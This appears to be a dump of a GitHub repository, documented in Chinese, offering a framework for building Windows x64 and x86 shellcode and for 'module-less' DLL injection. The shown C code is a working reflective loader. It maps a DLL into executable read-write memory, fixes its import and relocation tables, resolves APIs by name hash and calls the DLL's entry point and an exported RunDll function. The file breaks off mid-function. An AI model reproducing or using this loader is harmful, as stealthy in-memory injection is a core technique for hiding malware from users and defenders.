├── .gitattributes
├── README.md
├── ShellCodeFrame_x64
├── 64hhl_ring3_utility
│ ├── 64hhl_ring3_utility.sln
│ ├── 64hhl_ring3_utility.suo
│ ├── 64hhl_ring3_utility.vcproj
│ ├── 64hhl_ring3_utility.vcproj.LF-20161216IWOX.Administrator.user
│ ├── 64hhl_ring3_utility.vcproj.jj-PC.jj.user
│ ├── 64hhl_ring3_utility.vcproj.pxysocket-PC.pxysocket.user
│ ├── 64hhl_ring3_utility.vcproj.storm-PC.storm.user
│ ├── 64main.c
│ ├── 64nativeapi.h
│ ├── 64shellcode.c
│ ├── 64shellcode.h
│ ├── 64shellcode_ntapi_utility.c
│ ├── 64shellcode_ntapi_utility.h
│ ├── Debug
│ │ ├── 64hhl_ring3_utility.exe.embed.manifest
│ │ └── BuildLog.htm
│ ├── GetRing3ApiAddr.bin
│ ├── test.asm
│ └── x64
│ │ ├── Debug
│ │ ├── 64hhl_ring3_utility.exe.embed.manifest
│ │ ├── 64hhl_ring3_utility.exe.embed.manifest.res
│ │ ├── 64hhl_ring3_utility.exe.intermediate.manifest
│ │ └── BuildLog.htm
│ │ └── Release
│ │ ├── 64_shellcode_main.exe.intermediate.manifest
│ │ └── BuildLog.htm
├── ShellCodeFrame_x64.ncb
├── ShellCodeFrame_x64.sln
├── ShellCodeFrame_x64.suo
└── clear.bat
├── ShellCodeFrame_x86
├── Release
│ ├── TestShellcode.exe
│ └── hhl_shellcodeframe.exe
├── ShellCodeFrame_x86.sln
├── ShellCodeFrame_x86.suo
├── TestDll
│ ├── Debug
│ │ ├── BuildLog.htm
│ │ ├── TestDll.dll.embed.manifest
│ │ ├── TestDll.dll.embed.manifest.res
│ │ └── TestDll.dll.intermediate.manifest
│ ├── ReadMe.txt
│ ├── Release
│ │ ├── BuildLog.htm
│ │ └── TestDll.dll.intermediate.manifest
│ ├── TestDll.cpp
│ ├── TestDll.vcproj
│ ├── TestDll.vcproj.LF-20161216IWOX.Administrator.user
│ ├── TestDll.vcproj.LF-20170306AJGT.Administrator.user
│ ├── dllmain.cpp
│ ├── stdafx.cpp
│ ├── stdafx.h
│ └── targetver.h
├── TestShellcode
│ ├── Debug
│ │ ├── BuildLog.htm
│ │ ├── TestShellcode.exe.embed.manifest
│ │ ├── TestShellcode.exe.embed.manifest.res
│ │ ├── TestShellcode.exe.intermediate.manifest
│ │ └── TestShellcode.res
│ ├── ModuleLess.cpp
│ ├── ModuleLess.h
│ ├── ReadMe.txt
│ ├── Release
│ │ ├── BuildLog.htm
│ │ ├── TestShellcode.exe.intermediate.manifest
│ │ └── TestShellcode.res
│ ├── TestShellcode.aps
│ ├── TestShellcode.cpp
│ ├── TestShellcode.h
│ ├── TestShellcode.rc
│ ├── TestShellcode.vcproj
│ ├── TestShellcode.vcproj.LF-20161216IWOX.Administrator.user
│ ├── TestShellcodeDlg.cpp
│ ├── TestShellcodeDlg.h
│ ├── res
│ │ ├── TestShellcode.ico
│ │ └── TestShellcode.rc2
│ ├── resource.h
│ ├── stdafx.cpp
│ ├── stdafx.h
│ └── targetver.h
├── clear.bat
└── hhl_shellcodeframe
│ ├── Debug
│ ├── BuildLog.htm
│ ├── hhl_shellcodeframe.exe.embed.manifest
│ ├── hhl_shellcodeframe.exe.embed.manifest.res
│ └── hhl_shellcodeframe.exe.intermediate.manifest
│ ├── GetRing3ApiAddr.bin
│ ├── Release
│ ├── BuildLog.htm
│ ├── GetRing3ApiAddr.bin
│ ├── cmd.bat
│ ├── hhl_shellcodeframe.exe.intermediate.manifest
│ ├── sh_helloworld.exe
│ └── sh_helloworld.exe.intermediate.manifest
│ ├── ShellCode.bin
│ ├── cmd.bat
│ ├── hhl_shellcodeframe.sln
│ ├── hhl_shellcodeframe.suo
│ ├── hhl_shellcodeframe.vcproj
│ ├── hhl_shellcodeframe.vcproj.LF-20161216IWOX.Administrator.user
│ ├── hhl_shellcodeframe.vcproj.pxysocket-PC.pxysocket.user
│ ├── main.c
│ ├── nativeapi.h
│ ├── shellcode.c
│ ├── shellcode.h
│ ├── shellcode_ntapi_utility.c
│ └── shellcode_ntapi_utility.h
├── UnModuelInject
├── DLLtest
│ ├── DLLtest.cpp
│ ├── DLLtest.vcproj
│ ├── DLLtest.vcproj.DESKTOP-AS29ISP.YYYYY.user
│ ├── DLLtest.vcproj.storm-PC.storm.user
│ ├── Debug
│ │ ├── BuildLog.htm
│ │ ├── DLLtest.dll.embed.manifest
│ │ ├── DLLtest.dll.embed.manifest.res
│ │ ├── DLLtest.dll.intermediate.manifest
│ │ ├── DLLtest.obj
│ │ ├── DLLtest.pch
│ │ ├── dllmain.obj
│ │ ├── mt.dep
│ │ ├── stdafx.obj
│ │ ├── vc90.idb
│ │ └── vc90.pdb
│ ├── ReadMe.txt
│ ├── Release
│ │ ├── BuildLog.htm
│ │ ├── DLLtest.dll.intermediate.manifest
│ │ ├── DLLtest.obj
│ │ ├── DLLtest.pch
│ │ ├── dllmain.obj
│ │ ├── mt.dep
│ │ ├── stdafx.obj
│ │ ├── vc90.idb
│ │ └── vc90.pdb
│ ├── dllmain.cpp
│ ├── stdafx.cpp
│ ├── stdafx.h
│ ├── targetver.h
│ └── x64
│ │ └── Release
│ │ ├── BuildLog.htm
│ │ ├── DLLtest.dll.intermediate.manifest
│ │ ├── DLLtest.obj
│ │ ├── DLLtest.pch
│ │ ├── dllmain.obj
│ │ ├── mt.dep
│ │ ├── stdafx.obj
│ │ ├── vc90.idb
│ │ └── vc90.pdb
├── UnModuelInject.ncb
├── UnModuelInject.sln
├── UnModuelInject.suo
└── UnModuelInject
│ ├── Debug
│ ├── BuildLog.htm
│ ├── UnModuelInject.exe.embed.manifest
│ ├── UnModuelInject.exe.embed.manifest.res
│ ├── UnModuelInject.exe.intermediate.manifest
│ ├── UnModuelInject.pch
│ ├── UnModuleInject.obj
│ ├── Unmodule_Inject.obj
│ ├── mt.dep
│ ├── stdafx.obj
│ ├── vc90.idb
│ ├── vc90.pdb
│ ├── wow64ext.obj
│ └── x32ext.obj
│ ├── ReadMe.txt
│ ├── Release
│ ├── BuildLog.htm
│ ├── UnModuelInject.exe.intermediate.manifest
│ ├── UnModuelInject.pch
│ ├── UnModuleInject.obj
│ ├── Unmodule_Inject.obj
│ ├── mt.dep
│ ├── stdafx.obj
│ ├── vc90.idb
│ ├── vc90.pdb
│ ├── wow64ext.obj
│ └── x32ext.obj
│ ├── UnModuelInject.vcproj
│ ├── UnModuelInject.vcproj.DESKTOP-AS29ISP.YYYYY.user
│ ├── UnModuelInject.vcproj.storm-PC.storm.user
│ ├── UnModuleInject.cpp
│ ├── UnModuleInject.h
│ ├── Unmodule_Inject.cpp
│ ├── stdafx.cpp
│ ├── stdafx.h
│ ├── targetver.h
│ ├── wow64ext
│ ├── internal.h
│ ├── wow64ext.cpp
│ ├── wow64ext.h
│ ├── wow64ext_old.cpp
│ ├── x32ext.cpp
│ └── x32ext.h
│ └── x64
│ └── Release
│ ├── BuildLog.htm
│ ├── UnModuelInject.pch
│ ├── UnModuleInject.obj
│ ├── stdafx.obj
│ ├── vc90.idb
│ └── vc90.pdb
└── Windows平台下高级Shellcode编程技术.doc
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | =====================ShellCodeFrame_x64 ================
2 | # ShellCodeFrame_x64 工程介绍
3 |
4 | 项目详细介绍,查看“Windows平台下高级Shellcode编程技术.doc”
5 |
6 | 这是一个使用VS2008生成的编写x64位shellcode的框架。
7 | 在shellcode主代码中,按照内存对齐大小,将dll在内存中进行展开,修复导入表,修复重定位,根据导出表,寻找dll中函数的地址,调用指定dll的函数。
8 |
9 | =====================UnModuelInject================
10 |
11 | 使用生成的shellcode对静态dll进行无模块注入
12 |
13 |
14 | 配置 x64 插入汇编的VS环境。
15 |
16 | ==============ShellCodeFrame_x86 工程介绍===========
17 |
18 | 生成x86平台的shellcode的代码
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "64hhl_ring3_utility", "64hhl_ring3_utility.vcproj", "{BF58DCBE-3F38-4F72-9931-61DB1E52511D}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "64hhl_asm", "..\64hhl_asm\64hhl_asm.vcproj", "{E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Runbin", "..\64runbin\Runbin.vcproj", "{DE92D401-A9EE-43A1-81FB-5882DEA40E2B}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Win32 = Debug|Win32
13 | Debug|x64 = Debug|x64
14 | Release|Win32 = Release|Win32
15 | Release|x64 = Release|x64
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|Win32.ActiveCfg = Debug|Win32
19 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|Win32.Build.0 = Debug|Win32
20 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|x64.ActiveCfg = Debug|x64
21 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|x64.Build.0 = Debug|x64
22 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|Win32.ActiveCfg = Release|Win32
23 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|Win32.Build.0 = Release|Win32
24 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|x64.ActiveCfg = Release|x64
25 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|x64.Build.0 = Release|x64
26 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Debug|Win32.ActiveCfg = Debug|Win32
27 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Debug|Win32.Build.0 = Debug|Win32
28 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Debug|x64.ActiveCfg = Debug|x64
29 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Debug|x64.Build.0 = Debug|x64
30 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Release|Win32.ActiveCfg = Release|Win32
31 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Release|Win32.Build.0 = Release|Win32
32 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Release|x64.ActiveCfg = Release|x64
33 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Release|x64.Build.0 = Release|x64
34 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Debug|Win32.ActiveCfg = Debug|Win32
35 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Debug|Win32.Build.0 = Debug|Win32
36 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Debug|x64.ActiveCfg = Debug|x64
37 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Debug|x64.Build.0 = Debug|x64
38 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Release|Win32.ActiveCfg = Release|Win32
39 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Release|Win32.Build.0 = Release|Win32
40 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Release|x64.ActiveCfg = Release|x64
41 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Release|x64.Build.0 = Release|x64
42 | EndGlobalSection
43 | GlobalSection(SolutionProperties) = preSolution
44 | HideSolutionNode = FALSE
45 | EndGlobalSection
46 | EndGlobal
47 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.suo
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj.LF-20161216IWOX.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj.jj-PC.jj.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj.pxysocket-PC.pxysocket.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj.storm-PC.storm.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64main.c:
--------------------------------------------------------------------------------
1 |
2 |
3 | #include "64shellcode.h"
4 | #include "64shellcode_ntapi_utility.h"
5 | #include "64nativeapi.h"
6 | #include "64shellcode.h"
7 |
8 |
9 | void main()
10 | {
11 | #ifdef HHL_DEBUG
12 | SHELL_CODE_PARAM ShellCodeParam;
13 |
14 | FILE *fp;
15 | int nLength;
16 | UCHAR* pFileBase;
17 | wchar_t* lpReserved;
18 | char* lpProcName;
19 | wchar_t* lpRunCmd = NULL;
20 |
21 | /*HMODULE hMod = LoadLibrary(L"c:\\testdll64.dll");
22 | if(hMod)
23 | {
24 | pRunDll RunDll =(pRunDll)GetProcAddress(hMod, "RunDll");
25 | RunDll(L"aaaaaaaaaaaaa");
26 | }*/
27 |
28 | fp = fopen("c:\\MainProgram.dll", "rb");
29 |
30 | if(fp)
31 | {
32 | nLength = filelength(fileno(fp));
33 | pFileBase = (char*)malloc(nLength+1);
34 | if(pFileBase)
35 | {
36 | memset(pFileBase, 0, nLength+1);
37 | }
38 | fread(pFileBase, nLength, 1, fp);
39 | fclose(fp);
40 |
41 | }
42 | else
43 | {
44 | return;
45 | }
46 |
47 | InitApiHashToStruct();
48 |
49 | ShellCodeParam.lpFileBase = pFileBase;
50 |
51 | lpReserved = (wchar_t*)malloc(MAX_PATH);
52 | memset(lpReserved, 0, MAX_PATH);
53 | wsprintf((LPSTR)lpReserved, L"Hello World!");
54 | ShellCodeParam.lpReserved = lpReserved;
55 |
56 | lpProcName = (char*)malloc(MAX_PATH);
57 | memset(lpProcName, 0, MAX_PATH);
58 | sprintf(lpProcName, "RunDll");
59 | ShellCodeParam.lpProcName = lpProcName;
60 |
61 | lpRunCmd = (wchar_t*)malloc(MAX_PATH);
62 | memset(lpRunCmd, 0, MAX_PATH);
63 | wsprintf(lpRunCmd, L"-a aaaaaaaaaaaa -u uuuuuuuuuuuuuu");
64 | ShellCodeParam.lpRunCmd = lpRunCmd;
65 |
66 | AlignRSPAndCallShEntry(&ShellCodeParam);
67 |
68 | if(lpRunCmd)
69 | free(lpRunCmd);
70 |
71 | if(lpProcName)
72 | free(lpProcName);
73 |
74 | if(lpReserved)
75 | free(lpReserved);
76 |
77 | if(pFileBase)
78 | free(pFileBase);
79 |
80 | #else
81 | InitApiHashToStruct();
82 | #endif
83 | }
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64nativeapi.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/64nativeapi.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode.c:
--------------------------------------------------------------------------------
1 | #include "64shellcode.h"
2 | #include "64shellcode_ntapi_utility.h"
3 | #include "64nativeapi.h"
4 |
5 |
6 |
7 | TShellData ShellData;
8 |
9 | #define Shellcode_Final_Start ShellCode_Start
10 | #define Shellcode_Final_End MyShellCodeFinalEnd
11 |
12 |
13 |
14 | #ifdef HHL_DEBUG
15 | PShellData lpData= (PShellData)(&ShellData); //调试模式要指向我们初始化好了的静态全局结构体 ShellData
16 | #else
17 |
18 | #endif
19 |
20 |
21 |
22 |
23 | void ShellCode_Start(PSHELL_CODE_PARAM pShellCodeParam)
24 | {
25 | AlignRSPAndCallShEntry(pShellCodeParam);
26 | }
27 |
28 | DWORD64 MyGetProcAddress(
29 | HMODULE hModule, // handle to DLL module
30 | LPCSTR lpProcName // function name
31 | )
32 | {
33 |
34 | int i=0;
35 |
36 | PIMAGE_DOS_HEADER pImageDosHeader = NULL;
37 | PIMAGE_NT_HEADERS pImageNtHeader = NULL;
38 | PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
39 | DWORD *pAddressOfFunction;
40 | DWORD *pAddressOfNames;
41 | DWORD dwNumberOfNames;
42 | DWORD dwBase;
43 | WORD *pAddressOfNameOrdinals;
44 | DWORD dwName;
45 | char *strFunction;
46 | DWORD64 dwVirtualAddress;
47 | DWORD dwSize;
48 |
49 | pImageDosHeader=(PIMAGE_DOS_HEADER)hModule;
50 | pImageNtHeader=(PIMAGE_NT_HEADERS)((UINT64)hModule+pImageDosHeader->e_lfanew);
51 | dwVirtualAddress = pImageNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
52 | dwSize = pImageNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
53 | if(dwVirtualAddress == 0 || dwSize == 0) // 没有导出表
54 | {
55 | return 0;
56 | }
57 | pImageExportDirectory=(PIMAGE_EXPORT_DIRECTORY)((UINT64)hModule+dwVirtualAddress);
58 |
59 | pAddressOfFunction = (DWORD*)(pImageExportDirectory->AddressOfFunctions + (UINT64)hModule);
60 | pAddressOfNames = (DWORD *)(pImageExportDirectory->AddressOfNames + (UINT64)hModule);
61 | dwNumberOfNames = (DWORD)(pImageExportDirectory->NumberOfNames);
62 | dwBase = (DWORD)(pImageExportDirectory->Base);
63 |
64 | pAddressOfNameOrdinals = (WORD*)(pImageExportDirectory->AddressOfNameOrdinals + (UINT64)hModule);
65 |
66 | //这个是查一下是按照什么方式(函数名称or函数序号)来查函数地址的
67 | dwName = (DWORD)lpProcName;
68 | if ((dwName & 0xFFFF0000) == 0)
69 | {
70 | goto xuhao;
71 | }
72 | for (i=0; i<(int)dwNumberOfNames; i++)
73 | {
74 | strFunction = (char *)(pAddressOfNames[i] + (UINT64)hModule);
75 | if (strcmp(lpProcName, strFunction) == 0)
76 | {
77 | return (DWORD64)(pAddressOfFunction[pAddressOfNameOrdinals[i]] + (UINT64)hModule);
78 | }
79 | }
80 | return 0;
81 | //这个是通过以序号的方式来查函数地址的
82 | xuhao:
83 | if (dwName < dwBase || dwName > dwBase + pImageExportDirectory->NumberOfFunctions - 1)
84 | {
85 | return 0;
86 | }
87 | return (DWORD64)(pAddressOfFunction[dwName - dwBase] + (UINT64)hModule);
88 | }
89 |
90 | void ShellCode_Entry(PSHELL_CODE_PARAM pShellCodeParam)
91 | {
92 | /*char hhl[]={'h','e','l','l','o','h','h','l',0};*/
93 |
94 | PVOID64 lpDynPEBuff;
95 | int nIndex;
96 | char* pLoadName;
97 | HINSTANCE hInstance;
98 | FARPROC fpFun;
99 | char *lpMemPage;
100 | long lCount;
101 | short int *pRelocationItem;
102 | int nOffset;
103 | int nType;
104 | DWORD dwEntryPoint;
105 | DLL_MAIN lpDllMain;
106 | PVOID64 pFileBase;
107 | PIMAGE_DOS_HEADER pImageDosHeader;
108 | PIMAGE_NT_HEADERS pImageNtHeaders;
109 | DWORD dwImageSize;
110 | WORD wNumberOfSections;
111 | PIMAGE_SECTION_HEADER pImageSectionHeaders;
112 | DWORD dwFileAlignMask;
113 | DWORD dwSectionAlignMask;
114 | PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;
115 | PIMAGE_THUNK_DATA pImageThunkData;
116 | PIMAGE_THUNK_DATA pImageOriginalThunkData;
117 | PIMAGE_IMPORT_BY_NAME pImageImportByName;
118 | PIMAGE_BASE_RELOCATION pImageBaseRelocation;
119 | ULONGLONG ulDifference;
120 | pRunDll RunDll;
121 |
122 | #ifndef HHL_DEBUG
123 | PShellData lpData= (PShellData)((ULONG64)Shellcode_Final_End);//生成shellcode时候恢复回来
124 | #endif
125 |
126 | if(GetRing3ApiAddr() == FALSE) return;
127 |
128 | //lpData->xOutputDebugStringA(hhl);
129 |
130 | // 有效性校验
131 | if(lpData == NULL) return;
132 |
133 | // 文件在内存中的基址
134 | pFileBase = pShellCodeParam->lpFileBase;
135 |
136 | // 有效性校验
137 | if(pFileBase == NULL) return;
138 |
139 | // DOS部首
140 | pImageDosHeader = (PIMAGE_DOS_HEADER)pFileBase;
141 |
142 | // 有效性校验
143 | if(pImageDosHeader == NULL || IMAGE_DOS_SIGNATURE != pImageDosHeader->e_magic) return;
144 |
145 | // PE文件头
146 | pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD64)pFileBase + pImageDosHeader->e_lfanew);
147 |
148 | // 有效性校验
149 | if(IMAGE_NT_SIGNATURE != pImageNtHeaders->Signature) return;
150 |
151 | // 映像大小
152 | dwImageSize = pImageNtHeaders->OptionalHeader.SizeOfImage;
153 |
154 | // 分配映像空间
155 | lpDynPEBuff = (char *)lpData->xVirtualAlloc(NULL, dwImageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
156 |
157 | // 有效性校验
158 | if(lpDynPEBuff == NULL) return;
159 |
160 | // 初始化
161 | my_sh_memset(lpDynPEBuff, 0, dwImageSize);
162 |
163 | // 文件的区块数目
164 | wNumberOfSections = pImageNtHeaders->FileHeader.NumberOfSections;
165 |
166 | // 第一个块表,一般是.text段
167 | pImageSectionHeaders = IMAGE_FIRST_SECTION(pImageNtHeaders);//(PIMAGE_SECTION_HEADER)((char *)pImageNtHeaders + sizeof(PIMAGE_NT_HEADERS));
168 |
169 | // 把文件中前0x1000个字节复制到映像中
170 | my_sh_memcpy(lpDynPEBuff, pFileBase, pImageSectionHeaders->VirtualAddress);
171 |
172 | // 文件对齐,PE文件中区块对齐值,一般为200h
173 | dwFileAlignMask = pImageNtHeaders->OptionalHeader.FileAlignment - 1;
174 |
175 | // 被装入内存时的区块对齐大小,一般为1000h
176 | dwSectionAlignMask = pImageNtHeaders->OptionalHeader.SectionAlignment - 1;
177 |
178 | // 把PE文件中的区块数据复制到内存映像中
179 | for(nIndex = 0; nIndex < wNumberOfSections; nIndex++, pImageSectionHeaders++)
180 | {
181 | // 区块的映像初始地址,文件偏移,文件大小
182 | my_sh_memcpy((PVOID64)((DWORD64)lpDynPEBuff + pImageSectionHeaders->VirtualAddress), (UCHAR*)pFileBase + pImageSectionHeaders->PointerToRawData, pImageSectionHeaders->SizeOfRawData);
183 | }
184 |
185 | // 处理输入表
186 | if(pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size > 0)
187 | {
188 | // 输入表
189 | pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD64)lpDynPEBuff + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
190 |
191 | // DLL名不为空循环
192 | for(; pImageImportDescriptor->Name != 0; pImageImportDescriptor++)
193 | {
194 | // DLL的第一个引入函数
195 | pImageThunkData = (PIMAGE_THUNK_DATA)((DWORD64)lpDynPEBuff + pImageImportDescriptor->FirstThunk);
196 |
197 | pImageOriginalThunkData = (PIMAGE_THUNK_DATA)((DWORD64)lpDynPEBuff + pImageImportDescriptor->OriginalFirstThunk);
198 |
199 | // DLL名称
200 | pLoadName = (char*)((DWORD64)lpDynPEBuff + pImageImportDescriptor->Name);
201 |
202 | // 得到DLL的句柄
203 | hInstance = lpData->xLoadLibraryA(pLoadName);
204 |
205 | // 失败,则释放分配的空间
206 | if(hInstance == NULL)
207 | {
208 | lpData->xVirtualFree(lpDynPEBuff, dwImageSize, MEM_DECOMMIT);
209 | return;
210 | }
211 |
212 | // 循环处理本DLL中的输入函数
213 | for(; pImageOriginalThunkData->u1.Ordinal != 0; pImageThunkData++, pImageOriginalThunkData++)
214 | {
215 |
216 | if(pImageOriginalThunkData->u1.Ordinal & IMAGE_ORDINAL_FLAG64) // 当最高位为1为,表示函数以序号方式输入
217 | {
218 | // 低31位代表函数的序号
219 | fpFun = lpData->xGetProcAddress(hInstance, (LPCSTR)(pImageOriginalThunkData->u1.Ordinal & 0x0000ffff));
220 | }
221 | else // 当最高位为0时,表示以函数名方式输入
222 | {
223 | pImageImportByName = (PIMAGE_IMPORT_BY_NAME)((DWORD64)lpDynPEBuff + pImageOriginalThunkData->u1.Ordinal);
224 | fpFun = lpData->xGetProcAddress(hInstance, (LPCSTR)pImageImportByName->Name);
225 | }
226 |
227 | // 失败,则释放分配的空间
228 | if(fpFun == NULL)
229 | {
230 | lpData->xVirtualFree((LPVOID)lpDynPEBuff, dwImageSize, MEM_DECOMMIT);
231 | return;
232 | }
233 |
234 | // 用函数地址代替字符串指针
235 | pImageThunkData->u1.Ordinal = (UINT64)fpFun;
236 | }
237 | }
238 | }
239 |
240 |
241 | // 处理重定位表
242 | if(pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size > 0)
243 | {
244 | // 重定位表地址
245 | pImageBaseRelocation = (PIMAGE_BASE_RELOCATION)((DWORD64)lpDynPEBuff + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
246 |
247 | // 理论基址和真实基址之间的差值
248 | ulDifference = (ULONGLONG)lpDynPEBuff - pImageNtHeaders->OptionalHeader.ImageBase;
249 |
250 | // 需要重定位的数据分成一块一块的
251 | for(; pImageBaseRelocation->VirtualAddress != 0; )
252 | {
253 | // 重定位块基址
254 | lpMemPage = (char *)((DWORD64)lpDynPEBuff + pImageBaseRelocation->VirtualAddress);
255 |
256 | // 算出需要重定位的数量
257 | lCount = (pImageBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
258 |
259 | // 指向重定位数组的开始
260 | pRelocationItem = (short int *)((char *)pImageBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
261 |
262 | // 重定位每一项,每一项都是一个WORD
263 | for(nIndex = 0; nIndex < lCount; nIndex++)
264 | {
265 | // 低12位代表偏移
266 | nOffset = pRelocationItem[nIndex] & 0x0fff;
267 |
268 | // 高4位代表类型
269 | nType = pRelocationItem[nIndex] >> 12 & 0xf;
270 |
271 | // 代表需要重定位
272 | if(nType == IMAGE_REL_BASED_DIR64)
273 | {
274 | *(ULONGLONG*)(lpMemPage + nOffset) += ulDifference;
275 | }
276 | // 只是个占位符,为了4字节对齐
277 | else if(nType == IMAGE_REL_BASED_ABSOLUTE)
278 | {
279 | }
280 | }
281 |
282 | // 指向下一个重定位块
283 | pImageBaseRelocation = (PIMAGE_BASE_RELOCATION)(pRelocationItem + lCount);
284 | }
285 | }
286 |
287 | // 获取入口点偏移
288 | dwEntryPoint = pImageNtHeaders->OptionalHeader.AddressOfEntryPoint;
289 |
290 | // 获取入口点函数
291 | lpDllMain = (DLL_MAIN)((ULONGLONG)lpDynPEBuff + dwEntryPoint);
292 |
293 | // 调用入口点函数
294 | lpDllMain((HMODULE)lpDynPEBuff, 1, pShellCodeParam->lpReserved);
295 |
296 | if(pShellCodeParam->lpProcName != NULL)
297 | {
298 | RunDll = (pRunDll)MyGetProcAddress((HMODULE)lpDynPEBuff, (LPCSTR)pShellCodeParam->lpProcName);
299 |
300 | if(RunDll)
301 | {
302 | RunDll((wchar_t*)pShellCodeParam->lpRunCmd);
303 | }
304 | }
305 | return (PVOID)lpData;
306 | }
307 |
308 |
309 |
310 |
311 |
312 | DWORD GetRolHash(char *lpszBuffer)
313 | {
314 | DWORD dwHash = 0;
315 | while(*lpszBuffer)
316 | {
317 | dwHash = ( (dwHash <<25 ) | (dwHash>>7) );
318 | dwHash = dwHash+*lpszBuffer;
319 | lpszBuffer++;
320 | }
321 | return dwHash;
322 | }
323 |
324 |
325 | FARPROC Hash_GetProcAddress(HMODULE hModuleBase,DWORD dwNameHash,PVOID lpGetAddr)
326 | {
327 | FARPROC pRet = NULL;
328 | TGetProcAddress xGetProcAddress;
329 | PIMAGE_DOS_HEADER lpDosHeader;
330 | PIMAGE_NT_HEADERS lpNtHeaders;
331 | PIMAGE_EXPORT_DIRECTORY lpExports;
